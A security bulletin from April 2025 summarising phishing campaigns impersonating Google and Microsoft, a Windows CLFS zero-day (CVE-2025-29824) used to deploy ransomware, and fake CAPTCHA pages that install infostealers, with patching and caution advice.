Security Bulletin

April 29th, 2025

Who: 

A sophisticated phishing campaign has been identified, targeting Gmail users by impersonating official Google communications.​

What: 

Attackers are sending emails that appear to originate from no-reply@accounts.google.com, a legitimate Google address. These emails claim that Google has received a subpoena concerning the recipient's account and prompt users to click on a link leading to a fraudulent "support portal" hosted on sites.google.com. This portal is designed to harvest user credentials by mimicking Google's legitimate services.​

Security Brief: Phishing Campaigns Use Real-Time Validation for Credential Theft

Who: Threat actors employing advanced phishing techniques, tracked by Cofense and Ontinue. Related activity linked to clusters Storm-1811 and STAC5777.

What: A new tactic dubbed “precision-validating phishing” uses real-time email validation to display fake login pages only to verified, high-value email accounts. This approach improves success rates and evades detection by security tools. Additional phishing lures use file deletion notices to deliver malware or direct users to bogus Microsoft login pages. In a separate campaign, attackers used Microsoft Teams messages and Quick Assist for remote access and multi-stage compromise.

Impact:

Who: A threat actor tracked as Storm-2460 exploited a Windows zero-day (CVE-2025-29824) using the PipeMagic trojan to deploy ransomware. Victims include IT, real estate, financial, software, and retail sectors across the U.S., Venezuela, Spain, and Saudi Arabia.

What: The vulnerability, a privilege escalation flaw in Windows Common Log File System (CLFS), was used to gain SYSTEM privileges. Attackers delivered encrypted ransomware payloads via a malicious MSBuild file and certutil, leveraging compromised third-party sites.

Impact: Systems were compromised to steal credentials (via LSASS dump) and encrypt files with ransomware linked to the RansomEXX family. Windows 11 version 24H2 is not affected. Microsoft has patched the flaw and urges immediate updates.

Action Needed:

• Apply April 2025 Patch Tuesday updates.

Who: Threat actors are compromising widely used websites across various industries, embedding a fake CAPTCHA challenge to deliver malware.

What: Victims visiting these compromised sites are presented with a CAPTCHA challenge or redirected to another site with instructions. This process triggers PowerShell code execution, leading to the installation of information-stealing malware. Affected sites include HEP2go (a physical therapy video site) and several auto dealership websites.

Impact: Users who interact with the fake CAPTCHA risk having their systems compromised by malware that can steal sensitive information. Arctic Wolf has implemented detections for this attack and urges users to remain cautious.

Recommendations:

• Avoid websites with suspicious CAPTCHA challenges. If a CAPTCHA asks you to copy and paste a command into the Windows Run dialog, the site is likely compromised.